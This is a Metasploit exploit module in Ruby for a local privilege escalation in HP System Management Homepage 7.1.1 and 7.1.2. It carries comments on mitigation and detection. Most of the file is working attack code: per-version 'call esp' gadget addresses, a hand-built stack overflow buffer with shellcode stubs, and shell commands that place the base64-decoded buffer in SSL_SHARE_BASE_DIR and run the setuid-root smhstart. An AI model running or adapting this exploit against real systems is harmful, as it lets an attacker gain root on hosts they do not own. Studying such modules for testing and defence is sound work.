Path: blob/master/modules/exploits/linux/local/hp_smhstart.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Local privilege escalation against HP System Management Homepage (SMH).
#
# Per the module description, SMH <= 7.1.2 ships a setuid-root `smhstart`
# binary whose handling of the SSL_SHARE_BASE_DIR environment variable is
# subject to a stack buffer overflow. The module only works from a shell
# session already running as the `hpsmh` account (checked in #exploit).
#
# Defensive notes (from the behaviour visible in #exploit):
#   - Mitigation: the description scopes the issue to SMH <= 7.1.2; hosts on
#     those versions should be updated.
#   - Detection: an `smhstart` execution by the `hpsmh` user from an
#     interactive shell, with SSL_SHARE_BASE_DIR set from a base64-decoded
#     value, is the observable footprint of this module.
class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Exploit::EXE
  include Msf::Post::File

  include Msf::Exploit::Local::Linux

  # Registers module metadata and the single option `smhstartDir`.
  #
  # @param info [Hash] metadata merged by update_info (framework convention)
  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => 'HP System Management Homepage Local Privilege Escalation',
          'Description' => %q{
            Versions of HP System Management Homepage <= 7.1.2 include a setuid root
            smhstart which is vulnerable to a local buffer overflow in SSL_SHARE_BASE_DIR
            env variable.
          },
          'License' => MSF_LICENSE,
          'Author' => [
            'agix' # @agixid # Vulnerability discovery and Metasploit module
          ],
          'Platform' => [ 'linux' ],
          'Arch' => [ ARCH_X86 ],
          'SessionTypes' => [ 'shell' ],
          # 'Space' bounds the encoded payload that #exploit places in the
          # buffer; 'BadChars' excludes NUL and '"' (the value travels through
          # an environment variable and a shell command line).
          'Payload' => {
            'Space' => 227,
            'BadChars' => "\x00\x22"
          },
          'References' => [
            ['OSVDB', '91990']
          ],
          # Each target carries the version-specific 'CallEsp' gadget address
          # and the 'Offset' (padding length) used by #exploit.
          'Targets' => [
            [
              'HP System Management Homepage 7.1.1',
              {
                'Arch' => ARCH_X86,
                'CallEsp' => 0x080c86eb, # call esp
                'Offset' => 58
              }
            ],
            [
              'HP System Management Homepage 7.1.2',
              {
                'Arch' => ARCH_X86,
                'CallEsp' => 0x080c8b9b, # call esp
                'Offset' => 58
              }
            ],
          ],
          # smhstart is setuid root, so the payload is prefixed with a
          # setuid stub by default (framework option).
          'DefaultOptions' => {
            'PrependSetuid' => true
          },
          'DefaultTarget' => 0,
          'DisclosureDate' => '2013-03-30',
          'Notes' => {
            'Reliability' => UNKNOWN_RELIABILITY,
            'Stability' => UNKNOWN_STABILITY,
            'SideEffects' => UNKNOWN_SIDE_EFFECTS
          },
        }
      )
    )
    # Directory containing smhstart; the default ends in '/', so the command
    # built in #exploit contains '//' — harmless to the shell, but worth
    # knowing when reading logs.
    register_options([
      OptString.new("smhstartDir", [ true, "smhstart directory", "/opt/hp/hpsmh/sbin/" ])
    ])
  end

  # Builds the overflow buffer, verifies the session runs as `hpsmh`, then
  # launches smhstart with SSL_SHARE_BASE_DIR set to that buffer.
  #
  # Buffer layout (in order): encoded payload, little-endian 'CallEsp'
  # address, a 6-byte `add esp` stub, a 5-byte `jmp` back to the payload,
  # then 'Offset' bytes of random alphabetic padding.
  #
  # @raise via fail_with(Failure::NoAccess) when the session user is not hpsmh
  def exploit
    pl = payload.encoded
    padding = rand_text_alpha(target['Offset'])
    ret = [target['CallEsp']].pack('V') # 32-bit little-endian, matching ARCH_X86
    exploit = pl
    exploit << ret
    exploit << "\x81\xc4\x11\xff\xff\xff" # add esp, 0xffffff11
    exploit << "\xe9\x0e\xff\xff\xff" # jmp => beginning of pl
    exploit << padding
    exploit_encoded = Rex::Text.encode_base64(exploit) # to not break the shell base64 is better
    # Precondition: smhstart is only reachable this way as the hpsmh account.
    # NOTE(review): assumes cmd_exec returns the command output without a
    # trailing newline — confirm against the session implementation.
    id = cmd_exec("id -un")
    if id != "hpsmh"
      fail_with(Failure::NoAccess, "You are #{id}, you must be hpsmh to exploit this")
    end
    # The buffer is decoded on the target side so raw bytes never appear
    # directly on the command line.
    cmd_exec("export SSL_SHARE_BASE_DIR=$(echo -n '#{exploit_encoded}' | base64 -d)")
    # smhstartDir is an operator-supplied module option, interpolated unquoted.
    cmd_exec("#{datastore['smhstartDir']}/smhstart")
  end
end